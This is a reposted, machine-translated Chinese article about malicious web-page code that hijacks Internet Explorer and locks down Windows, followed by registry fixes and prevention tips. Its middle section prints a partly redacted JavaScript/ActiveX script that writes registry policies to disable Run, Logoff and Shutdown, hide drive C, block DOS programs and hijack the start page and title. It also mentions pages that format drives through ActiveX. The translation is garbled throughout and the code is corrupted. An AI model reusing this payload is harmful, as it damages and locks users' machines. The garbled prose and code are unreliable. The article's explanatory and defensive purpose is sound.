Seize the "black hand" of the web malicious code

zhaozj2021-02-08  216

                                                                 The symptom of this "virus" can be hurt in the rescue signal: After unintentional, then find the IE title bar, IE start home page is inexplicably modified, each time the inexplicable prompt box, modify the input method The startup item, the start-independent program ..., more articles say: Some web "viruses" will format the hard disk. What is more incorporated is that the "Internet Options" operating interface under the IE "Tool" menu cannot be modified to restore the original. Today, in the Internet, who is going to browse many web pages every day? If there is such a virus, have you got it? The editor is from the netizen, the forum has collected some information, and after more detailed analysis, the greater ingredient of this "virus" is malicious code. Let's take a step in step by step to expose these malicious code and uncover its "mysterious" veil! 】

Related network abstract

The following is an article from the Internet (because you don't know the source, please contact us) What malicious code can format the hard drive is not a hole!

One day, I suddenly listened to my friend. When he was online, I did not know what to hit, and all his hard drives were formatted. My first thought is: Which should be a famous domestic macro virus "July killer"? However, this macro virus is added "Deltreec: // Y" in the system autoexec.bat file, and the entire hard drive should not be formatted. It wouldn't be ... I have seen a presentation in a magazine, saying that IE can format the hard disk by executing ActiveX, and remember that the source code is also announced, just the source code announced at the time. For the Spanish version of Windows, it is useless for the Chinese version of Windows, maybe those code have been changed to the Chinese Windows now.

Ask your friends, he is also a rare martial arts that is formatted away from the hard drive, and the website that is entered at the time does not remember. There is no way, I have to go to some of the domestic websites to find similar theme articles. The emperor is not worried, and finally found a few HTML files that can format the hard drive. The moderator on the website is self-hearted, reminds the downloaded netizen: only self-study, it is unachable.

Considering the risk, I first open one of them to see the source code. I didn't think this source file actually gave the secret. It is a script written by javascript. The part of the encrypted part seems to be only the definition of some characters, and true The script content is also just display some characters on the screen. Because your own machine is just installed, there is no particularly important data, so I have the idea of ​​"I will die", open this HTML file with IE browser. Next, the browser issues a warning: "The ActiveX control on this page interacts in any part of the page, whether to interact?" If you choose "Yes", you will run those unsafe controls. However, this HTML file I tried is just a joke for everyone. After you open it, what is it saying "Your C drive has been formatted by it, and it is formatted once it is restarted. Please do not start, save it immediately The files are like this. I carefully check the contents of the Windows launch program, and there is no change, so I am safely restarting, and it is the opening of it. In another HTML file downloaded, look at the source code, can't help but hop. There are only 24 lines of the program only in the 30 generation code, which is called the format.com command from Windows, it is really enough. In addition to the two except of A, B, as long as you can divide C-Z, it will be formatted. In order to verify its effect, I don't want my hard drive to be formatted. I changed my name in Windows, and then opened the HTML file with IE. The browser also issued a warning: "Some of the page Some software (ActiveX controls) may not be safe. It is recommended that you do not run. Is it allowed? ". When you choose "Yes", dozens of DOS windows will pop up, probably because it can't find Format.com file, find all DOS windows, no display. It not only calls format.com, and also add some parameters, such as fast formatting, etc., plus formatting the window has automatically completed the hard disk formatting, waiting for you to find it, it has repented late. . Fortunately, I have changed my name in advance, otherwise it would like to know.

Poisoning phenomenon sketch:

The author collects online speech and divides it as follows:

(1), the default home page is modified:

"Recently, my computer has a strange phenomenon. The browser's default home page is automatically set to www. ********. CoM, I didn't pay attention, I thought as long as I IE" Internet Options "Modified to the original settings, after the modification, there is no matter, but the next day is turned on, it is changed back."

(2), IE title column is modified:

"I don't know when I start, what is the title bar in my open IE page" Let history tell the future, "www.zhiqing.org" words; "

(3) The prompt box appears when booting:

"After viewing a web page, after reading the author's high-needed" Remove the IE default homepage, the title is strange to add one "(http://www.yesky.com/20010808/191701.shtml) Although I solved the removal of the default home page problem, there is a prompt box when I can't turn it off, what "Welcome to www.play.gs" is! "(4), IE the IE address bar:

"There are some inexplicable texts under the address bar, I don't know how to go."

(5) If the registry key related to IE is invalid in the registry item such as the default homepage in the inferrator:

"Some websites are very disgustable, it sets IE's default web page to the name of the site, I still can't take effect by modifying the registry item" StartPage "and" default_page_url ", I don't know what to do!"

(6), click the right click in Internet Exploer, and the links of illegal sites appear in the menu:

"The same is because of a website, after browsing the web, if you click the right button, there is a link to the illegal site in the menu."

(7), modify the operating system

"Browse a website, then discovered that the system has banned the 'Close System', 'Run', 'Logout', and the C drive cannot be found, the registry editor regedit cannot be used, the DOS program cannot run, unable to enter the system mode"

Program explanation

The author understands some knowledge about Applet, ActiveX, and scripting language, and has analyzed the JavaScript script files from which it is downloaded after downloading the malicious code. For security reasons, please don't write code completely or explain too fine about the program's writing, just let everyone know that this code is not mysterious. Java's initial application is Applet program. Although Java is restricted by the security of Applet, these small applications can often be modified by means of normal or secret methods due to browser or language vulnerabilities. For example, modify the registry, run the related DOS command, install Trojans or activate the application on the user machine, the powerful far-flying non-simple web page can be competent, and it seems that now, what is the online spread? It is not surprised to see the virus or hard disk in the relevant page. In addition, there is an embedded application to activeX, a plug-in technology of Microsoft, or some operations for this machine like Applet. Let us now understand the following code preparation (if you don't understand the scripting language, you can only see which registry items you have modified, then find these entries and modify it back).

Document.write (" ");

File: // Embed an Applet file

Function f) {file: // make a variety of modified statements in this function

Try

{

// ActiveX Initialization

A1 = Document.Applets [0]; file: // Get Applet Run Object, the following statement points to the entry for IE in the registry

A1.SETCLSID ("{...........}");

A1.CreateInstance (); shl = a1.getObject ();

A1.SETCLSID ("{...........}");

A1.CREATEINSTANCE ();

FSO = a1.GetObject ();

A1.SETCLSID ("{...........}");

A1.CREATEINSTANCE ();

Net = a1.GetObject ();

Try

{

IF (Document.cookie.indexof ("CHG") == -1)

{

/ / The following is a modification of the value item related registration item value related to the operating system

/ / Make the system no "run" item to prevent users from fixing the settings via the registry editor.

SHL.Regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion // Policies //

Explorer // norun ", 01," reg_binary ");

/ / Let the operating system no "off system" option

SHL.Regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion // Policies //

Explorer // noclose ", 01," reg_binary ");

/ / Let the operating system no "log out" option

SHL.Regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion // Policies //

Explorer // Nologoff ", 01," REG_BINARY ");

Note: Make the victim system without "cancellation" item

/ / Let the operating system no logical drive C

SHL.Regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion // Policies //

Explorer // nodrives, "00000004", "reg_dword");

// Prohibit all DOS applications;

SHL.Regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion // Policies //

WinoldApp // Disabled, "REG_BINARY");

/ / Let the operating system unable to switch to the real mode of traditional DOS

SHL.REGWRITE ("HKCU // Software // Microsoft // Windows // CurrentVersion // Policies /

/ WinoldApp // NoreAlMode "," Reg_binary ");

/ / Show a login window when the system logs in, the following is the write startup pop-up dialog

Sh1.regwrite ("hklm // software // microsoft // windows // currentversion //////

Winlogon // Legal NoticeCaption "," ........ ");

// Write the startup pop-up dialog content Sh1.Regwrite ("HKLM // Software // Microsoft // Windows // CurrentVersion ////

Winlogon // legal notictext "," ............. ");

/ / The following is a modification of the IE related registry item value item

// Set the browser default home page

SH1.REGWRITE ("HKCU // Software // Microsoft // Internet Explorer // Main // Start Page",

"............");

/ / Modify the input method startup item in the startup

Sh1.regwrite ("hklm // software // microsoft // windows // currentversion //////

Run // Internat.e Xe "," ............ ");

// Set the registration cannot be changed

Sh1.regwrite ("HKCU // Software // Microsoft // Windows // CurrentVersion //

Policies // Winol Dapp // NoreAlMode "," 00000000 "," Reg_dword ");

/ / Modify the browser's title bar

SHL.REGWRITE ("HKLM // Software // Microsoft // InternetETexplorer // Main // WINDOWTITLE",

".............");

SHL.REGWRITE ("HKCU // Software // Microsoft // InternetETexplorer // Main // WINDOWTITLE",

"............");

// The following program adds a web page containing malicious code to the favorites.

Var WF, Shor, Loc;

WF = fso.getspecialfolder (0);

LOC = WF "// favorites";

IF (! fso.folderexists (loc))

{

Loc = fso.getdriveName (wf) "// Documents and settings //

" Net.username " // favorites ";

IF (fso.folderexiss (loc))

{

AddFavlnk (LOC, "Show Title .....", "URL ...");

}

}

/ / Set the cookie value

VAR EXPDATE = New Date ((New Date ()). getTime () (1));

Document.cookie = "chg = general; expires =" expdate.togmtstring () "; path = /;"

}

}

Catch (e)

{}

}

Catch (e) {}

}

// Initialization function, and perform a modification every other second

Function init ()

{

SetTimeout ("F ()", 1000);

}

INIT ();

In response to the countermeasure:

When you accidentally suffer from malicious code, you must first need to make a modification of the registry related table item value:

First, manual modification

1. Correct modifications to the default home page:

"Start" in HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / InternetExplorer / Main

Page "and" default_page_url ".

2. Change the modification of the title bar of Internet Explorer:

On the right side of HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Internet Explorer / Main

Modify the string value "Window Title" in the window for the name of the new title.

3. Correct the text changes under the address bar:

In HKEY_CURRENT_USER / SOFTWARE / Microsoft / Interner

Explorer / Toolbar, find the key value linksfoldername on the right, and delete the contents.

4, correct the modification of the Windows boot bar:

This situation is applicable to the modification of the registry key? Quot; start page "and

"Default_page_url" still does not take effect, you can try to open the following primary key:

HKEY_LOCAL_MACHINE / Microsoft / Windows / CurrentVersion / Run Modify the right column

"QWE" key value, delete the entry value, restart the computer.

5. Correct the link to the right button in the Internet Exploer:

Remove in HKEY_CURRENT_USER / SOFTWARE / Microsoft / Internet Explorer / Menuext

This key value is illegally linked.

6. Clear the address in the address bar in the browser:

In Heky_Current_User / Software / Microsoft / Internet

Use the useless key value in Explorer / TypeURLs.

Second, the application tool software

Download "Anti-Modification Elf" software:

The software can effectively prevent IE modifications, and can be downloaded to the Tianzhu MyDown Download Station.

Third, backup and command recovery

1: For Win9X users, press F8 key when the machine is started, select Under MS-DOS mode, use the ScanReg / Restore command to restore the normal registry previously backed up.

2: For Win2000 users, put the following COPY, save the recover.reg file, choose the security mode of the command line, import with the command regedit recover.reg, and then restart the machine:

The Recover.reg file is as follows:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / Explorer]

"NodriveTyPeautorun" = dword: 00000095

"Norun" = HEX:

"Nologoff" = HEX:

"NODRIVES" = dword: 00000000

"Restrictrun" = dword: 00000000 [HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / System]

"DisableregistryTools" = dword: 00000000

[HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / System]

"DisableregistryTools" = dword: 00000000

[HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / WinoldApp]

"Disabled" = dword: 00000000

[HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / WinoldApp]

"Norealmode" = dword: 00000000

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Winlogon]

"=" = "

"=" ""

[HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Internet Explorer / Main]

"Window title" = ""

[HKEY_CURRENT_USER / SOFTWARE / Microsoft / Internet Explorer / Main]

"Window title" = ""

Anti-happening is long:

The author read the online related articles, made some summary methods for the defense method, I hope you can do active prevention.

1. To avoid the tricks, the key is to easily go to some sites that you don't understand, especially those who look beautiful and attractive URLs, otherwise it is often you.

2, run the IE, click "Tools → Internet Options → Security → The security level of the Internet area," high "is changed to" high ".

3. Since this page is a web file containing an ActiveX or Applet, JavaScript containing a harmful code, so you can avoid it in the IE settings. ActiveX plugin and control, Java scripts, etc. can be avoided. The specific method is: Click "Tools → Internet Options in the IE window, select the" Security "tab in the pop-up dialog box, then click the" Custom Level "button, will pop up the Security Settings dialog box, put all of the ActiveX Plugins and controls and Java-related all select "Disable". However, doing this may result in some normal use of ActiveX in future web browsing. Hey, if you are good, you still look at it. Bar.

4. For Windows98 users, open C: /Windows/java/packages/cvlv1nbb.zip, delete it "ActiveXComponent.class"; For WindowsMe users, open C: /Windows/java/packages/5nzvfpf1.zip , Delete it "ActiveXComponent.class". Please feel free to delete this component will not affect you.

5, after installing the network firewall, especially after the Norton 2001 is installed, you will be able to write a script write registry, and the domestic anti-virus software KVW3000 also has such effects. It is recommended that you also install such software. 6. Although a hard work is modified back to the title and default connection home, but if you accidentally enter the station, you have to be troublesome. In fact, you can do some settings in IE to never enter the site:

Open IE, click "Tool" → "Internet Options" → "Content" → "Hierarchical Review", click the "Enable" button, will call the "Hierarchical Review" dialog box, then click "License Site" tab, enter you don't want to go Website URL, if you enter: http://www.xxx.com, press "Never" button, then click "OK" to tell! Browse the web normally.

7, set the registry related value item, "lock" for the registry

(1) Run the registry editor regedit.exe;

(2) Under HKEY_CURRENT_USER / CURRENTVERSION / Policies / System, add DWORD value named DisableRegistryTools, and change its value to "1" to disable usage of registry editor regedit.exe.

If you need to modify the registry due to other reasons, you can use the following unlocking method:

Edited an arbitrary name .reg file, such as Recover.reg, as follows:

Regedit4

[HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Policies / System]

"DisableregistryTools" = dword: 00000000

Then double-click to run Recover.REG.

Background information:

First, what is a registry

The registry is in Windows, stores a database for computer configuration information. The registry contains information that constantly references when Windows2000 operations, such as:

The configuration file for each user.

The program installed on the computer and the type of document that each program can create.

Property settings of folders and program icons.

Hardware in the system.

The port is being used.

The registry consists of hierarchical organization, consists of items, subtries, configuration units, and value items.

See Configuring Units; Child; Values.

Second, what is a value item?

The data string appears in the right pane in the registry window defines the value of the currently selected. There are three parts: name, data type, and value itself.

Third, what is a registry key

In the Registry Editor, the folder in the left pane of the Registry Editor window appears. The item can contain sub-items and value items. For example, Environment is an item of HKEY_CURRENT_USER.

Fourth, what is Java applet

The Java language can write two types of programs: Application (Application) and Applets. Applications can run independently, and Applet cannot run independently, you need to embed HTML files, follow a set of conventions, in support Java's browser (such as NetScapenavigator2.02), HOTJAVA, MicrosoftInternetExplorer 3.0.0 or more) run, It is an important application branch of Java. It is also the most interested place in Java (it changed the web page), which is to add animation, image, music, etc. in the WWW page (HomePage / Pages) design. These effects use the most JavaApplet and JavaScript (this is a Java command language language). Five, what is JavaScript

JavaScript is a scripting language based on object-based and eventddriven and has security. Using its purpose is to interact with the web client with the HTML hypertext markup language. Thus, you can develop a client application. It is implemented in a standard HTML language by embedding or file reference. Its appearance makes up for the shortcomings of the HTML language, which is a selection of Java and HTML, with objects based on object, simple, safe, dynamic, cross-platform characteristics.

Six, what is ActiveX

ActiveX is a group proposed by Microsoft's use of COM (ComponentObjectModel, component object model) to make software components interact in network environments. It doesn't matter with specific programming languages. As a technology for Internet application development, ActiveX is widely used in all aspects of the web server and client. At the same time, ActiveX technology is also used to facilitate creating a normal desktop application. ActiveX technology can be used in Applets, such as direct embed ActiveX control, or integrate multilingual program objects provided by other developers to Java in Java in Java. ActiveX provides "Codesigning" technology to ensure its security compared to Java's bytecode technology.

转载请注明原文地址:https://www.9cbs.com/read-2855.html

New Post(0)
CopyRight © 2020 All Rights Reserved
Processed: 0.040, SQL: 9